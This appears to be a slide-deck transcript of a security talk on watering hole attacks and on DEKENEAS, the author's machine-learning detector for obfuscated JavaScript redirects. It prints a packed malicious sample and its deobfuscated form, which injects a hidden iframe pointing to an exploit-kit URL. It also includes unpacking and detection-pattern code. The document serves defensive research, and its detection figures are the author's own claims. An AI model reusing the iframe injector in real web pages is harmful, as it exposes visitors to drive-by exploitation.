This document discusses watering hole attacks, a type of cyber attack in which attackers compromise websites that their targets visit frequently and infect visitors' devices through drive-by exploits. It describes how watering hole attacks work and why they are difficult to detect, and introduces DEKENEAS, an AI-based solution developed by the author that detects watering hole attacks by analyzing obfuscated JavaScript. DEKENEAS is built on an analysis of over 40,000 malicious redirect samples: more than 30,000 were used to train it to recognize behavioral patterns and classify code as malicious or not, and the remaining 10,000 were used for testing. When tested on approximately 10,000 malicious samples and the Alexa Top 1000 websites, it achieved a reported 100% detection rate for previously unknown implants, with 0% false negatives and 0.00023% false positives.
2. “WHAT IF I TOLD YOU THERE’S A TYPE OF CYBER ATTACK
THAT CAN INFECT YOUR COMPUTER WITHOUT YOU DOING
ANYTHING?”
3. IT’S CALLED “DRIVE-BY EXPLOITATION”. AND IT’S
DELIVERED THROUGH A VERY STEALTHY TECHNIQUE CALLED
“WATERING HOLE”.
4. EVERYBODY IS FAMILIAR WITH PHISHING, SPEARPHISHING
OR DIRECT SERVER ATTACKS…
… BUT NOT MANY PEOPLE HAVE HEARD ABOUT WATERING HOLE
ATTACKS.
5. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
An adversary gains access to a system when a user visits a website
in the normal course of browsing, just like predators stalking prey at
a real-life watering hole.
6. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
The attacker compromises a website that a certain group of people normally
visits and alters its HTML code so that users are redirected to an
exploit kit, which performs the actual exploitation.
Whether the exploitation is actually performed against a given user
depends on certain factors, such as the User-Agent or the IP address.
7. WHAT HAPPENS DURING A WATERING HOLE
ATTACK?
Finally, the exploit kit installs a malware implant on the unsuspecting
user’s device.
10. RECENT HIGH PROFILE KNOWN COMPROMISES
- Facebook, Google, Twitter – 2013, through an iOS dev forum
- undisclosed financial targets – 2014, through forbes.com
- Dragonfly campaign targeting multiple US government and critical
infrastructure sectors – 2016, through third-party suppliers' websites
- Polish banks – 2017, through the website of the Polish Financial
Supervision Authority
- many others go undetected or are recorded as “unknown infection vector”
11. WHY ARE WATERING HOLES HARD TO DETECT?
- unlike phishing or spearphishing, there is no e-mail or other user
interaction involved
- unlike direct server attacks, there are no server logs to review
- the redirection from the compromised website to the exploit kit happens
in the browser and is usually heavily obfuscated
- two watering hole implants rarely look the same, so no reliable
signature can be extracted
12. WHY ARE WATERING HOLES HARD TO DETECT?
- most of the time the exploit kits employ either 0-day or 1-day
vulnerabilities, so there is either no patch or people have had no time to
apply it
- the deobfuscation routine runs in the browser, so an AV or firewall
running outside the browser cannot see the deobfuscated code and
trigger an alarm
- the implants use anti-analysis techniques to deter automated
sandbox analysis
- ALL KNOWN WATERING HOLE ATTACKS WERE DISCOVERED IN THE
POST-EXPLOITATION STAGE, LONG AFTER THE ACTUAL COMPROMISE
13. OBFUSCATED WATERING HOLE JAVASCRIPT
VS. DEOBFUSCATED WATERING HOLE
JAVASCRIPT
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.repla
ce(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return
d[e]}];e=function(){return'w+'};c=1};while(c--
){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('i
9(){a=6.h('b');7(!a){5
0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://
z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-
1&&2.3("s")==-1))&&2.3("v")!=-1){5
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFra
meEx|element|yahoo_api|height|
width|display|none|body|getElementById|function|createElement|ifra
me|appendChild|src|id|nl|msie|
toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000
|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
// Deobfuscated form of the packed script above
function MakeFrameEx() {
    element = document.getElementById('yahoo_api');
    if (!element) {
        // Inject a hidden 1x1 iframe that loads the exploit kit page
        var el = document.createElement('iframe');
        document.body.appendChild(el);
        el.id = 'yahoo_api';
        el.style.width = '1px';
        el.style.height = '1px';
        el.style.display = 'none';
        el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732'
    }
}
// Only target Internet Explorer on Windows (not Opera or WebTV)
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1
        && ua.indexOf("webtv") == -1))
        && ua.indexOf("windows") != -1) {
    var t = setTimeout("MakeFrameEx()", 1000)
}
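The packed sample hands its decoded payload to eval(), so one way an analyst can recover the readable form is to intercept that call instead of letting it run. The sketch below is only an illustration of that idea, not the DEKENEAS implementation: `captureEval` is a hypothetical helper name, and it assumes the script is run inside a disposable analysis machine, because the unpacking routine itself still executes.

```javascript
// Hypothetical helper: records every string a script passes to eval()
// instead of executing it. The unpacking routine still runs, so use this
// only inside a throwaway analysis environment.
function captureEval(source) {
  const captured = [];
  // Stand-in for eval: store the code and do nothing else.
  const recorder = (code) => {
    captured.push(String(code));
    return undefined;
  };
  // Bodies created with the Function constructor are non-strict, so a
  // parameter named "eval" is allowed and shadows the real eval.
  const run = new Function("eval", source);
  run(recorder);
  return captured;
}

// Usage with a harmless stand-in for a packed script:
const layers = captureEval('eval(function(){return "var x = 1;"}())');
console.log(layers);
```

Only the first layer is captured this way; a payload that unpacks in several stages would need the same step repeated on each captured string.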
14. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- detecting a watering hole in the post-exploitation stage is
unacceptable in a secure computing environment
- we focused on detecting the watering hole at its earliest stage:
redirection
- redirection can be performed through various DOM elements, such
as iframes, document location or meta refresh, but most often
JavaScript is used to conceal this behavior through obfuscation
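To make the redirection primitives listed above concrete, here is a minimal sketch that flags which of them appear in a piece of markup. The pattern names and regular expressions are assumptions chosen for illustration, they are not taken from DEKENEAS, and plain pattern matching of this kind is exactly what obfuscation defeats, which is why the talk moves on to behavioral analysis.

```javascript
// Hypothetical patterns for the redirect primitives named in the slide.
// None of the regexes use the "g" flag, so test() keeps no state.
const REDIRECT_PATTERNS = {
  iframe: /<iframe\b[^>]*\bsrc\s*=/i,
  metaRefresh: /<meta\b[^>]*http-equiv\s*=\s*["']?refresh/i,
  documentLocation:
    /\b(?:document|window|top|self)\.location\b(?:\.href)?\s*=|\blocation\.(?:replace|assign)\s*\(/i,
  dynamicCode: /\b(?:eval|unescape)\s*\(|\bdocument\.write\s*\(|String\.fromCharCode/i,
};

// Returns the names of all primitives found in the given HTML/JavaScript.
function findRedirectPrimitives(html) {
  return Object.keys(REDIRECT_PATTERNS).filter((name) =>
    REDIRECT_PATTERNS[name].test(html)
  );
}

// Usage:
console.log(findRedirectPrimitives('<iframe src="http://example.com/" width="1"></iframe>'));
console.log(findRedirectPrimitives('<script>window.location = "http://example.com/";</script>'));
```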
15. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- for our research we analyzed over 40,000 malicious redirect samples
- we were able to determine general behavior metrics such as obfuscation, redirection,
anti-analysis capabilities, coding patterns and typologies
- by analyzing the HTML/JavaScript instruction set we were able to classify instructions
based on these metrics and create a model to be used in our machine learning algorithm
- the score depends not only on the instructions themselves, but also on their context
and placement inside the code
- we used more than 30,000 samples to train our algorithm and the remaining 10,000 to
test it
- we use a supervised random forest implementation for classification because it builds
a collection of decision trees, each with a random subset of parameters held out, and
such ensembles often outperform individual trees.
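As a rough illustration of what turning a script into behavior metrics and voting over a collection of trees can look like, the sketch below extracts a few numeric features and combines hand-written rules by majority vote. Everything in it is an assumption made for the example: the feature names, the regular expressions and the three stand-in "trees" are hypothetical, and a real random forest learns its trees from labeled samples rather than having them written by hand.

```javascript
// Shannon entropy in bits per character; packed or encoded payloads tend
// to score differently from hand-written code.
function shannonEntropy(text) {
  const chars = Array.from(text);
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) || 0) + 1);
  let entropy = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Number of matches of a global regex in the text.
function countMatches(text, pattern) {
  const found = text.match(pattern);
  return found ? found.length : 0;
}

// Hypothetical feature set covering obfuscation, redirection and
// anti-analysis hints.
function extractFeatures(script) {
  return {
    length: script.length,
    entropy: shannonEntropy(script),
    evalCalls: countMatches(script, /\beval\s*\(/g),
    decodeCalls: countMatches(script, /\b(?:unescape|atob|fromCharCode)\b/g),
    domWrites: countMatches(script, /\b(?:createElement|appendChild)\b|document\.write/g),
    userAgentChecks: countMatches(script, /\buserAgent\b/g),
    timers: countMatches(script, /\bset(?:Timeout|Interval)\s*\(/g),
  };
}

// A forest classifies by majority vote. Each "tree" here is a hand-written
// stand-in for a trained decision tree.
function forestPredict(trees, features) {
  const votes = trees.filter((tree) => tree(features)).length;
  return votes * 2 > trees.length;
}

// Usage:
const trees = [(f) => f.evalCalls > 0, (f) => f.decodeCalls > 0, (f) => f.timers > 0];
const features = extractFeatures('var ua = navigator.userAgent; eval(unescape("%61"));');
console.log(features, forestPredict(trees, features));
```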
16. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- the AI prediction is used to decide whether a DOM element
is suspicious or not
- a JavaScript sandbox and a generic sandbox are used in parallel to analyze
suspicious DOM elements, emulating user interaction (mouse movement,
keyboard activity, non-standard screen resolutions, etc.)
- if the AI prediction and the sandbox results are inconsistent,
the suspect DOM element is submitted for manual analysis
- the results of manual analysis are used to further train the machine
learning algorithm, thus reducing false positives and false negatives.
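The decision flow described in this slide can be sketched as a small triage function. This is an interpretation, not the actual DEKENEAS logic: the function name, the verdict strings and the rule that any sandbox failing to confirm the prediction counts as an inconsistency are all assumptions made for the example.

```javascript
// Hypothetical triage step.
//   modelSaysSuspicious: boolean prediction from the classifier
//   sandboxVerdicts: one boolean per sandbox, true meaning "malicious
//                    behavior observed"
function triage(modelSaysSuspicious, sandboxVerdicts) {
  // Elements the model does not flag are not sent to the sandboxes.
  if (!modelSaysSuspicious) return "pass";
  const confirmed = sandboxVerdicts.filter(Boolean).length;
  // Assumption: every sandbox must confirm the model's prediction.
  if (sandboxVerdicts.length > 0 && confirmed === sandboxVerdicts.length) {
    return "malicious";
  }
  // Any disagreement goes to a human, whose verdict can later be fed
  // back as a training label.
  return "manual-analysis";
}

// Usage: [JavaScript sandbox verdict, generic sandbox verdict]
console.log(triage(true, [true, true]));
console.log(triage(true, [true, false]));
console.log(triage(false, []));
```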
17. DETECTING WATERING HOLES THROUGH ARTIFICIAL
INTELLIGENCE - DEKENEAS
- we used approximately 10,000 malicious DOM samples and the Alexa
Top 1000 websites to test our machine learning algorithm
- during the testing phase we achieved a 100% detection rate for
previously unknown implants, with 0% false negatives and 0.00023% false
positives.
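For readers who want to relate these figures to raw counts, the sketch below shows how detection, false negative and false positive rates are conventionally derived from a confusion matrix. The function name and the counts in the usage line are purely illustrative and are not results from the talk.

```javascript
// Conventional rate definitions:
//   detection rate      = TP / (TP + FN)
//   false negative rate = FN / (TP + FN)
//   false positive rate = FP / (FP + TN)
function computeRates({ truePositives, falseNegatives, falsePositives, trueNegatives }) {
  const malicious = truePositives + falseNegatives;
  const benign = falsePositives + trueNegatives;
  return {
    detectionRate: malicious ? truePositives / malicious : 0,
    falseNegativeRate: malicious ? falseNegatives / malicious : 0,
    falsePositiveRate: benign ? falsePositives / benign : 0,
  };
}

// Usage with made-up counts (not data from the presentation):
console.log(
  computeRates({ truePositives: 3, falseNegatives: 1, falsePositives: 1, trueNegatives: 3 })
);
```

Multiplying each rate by 100 gives the percentage form used in the slide.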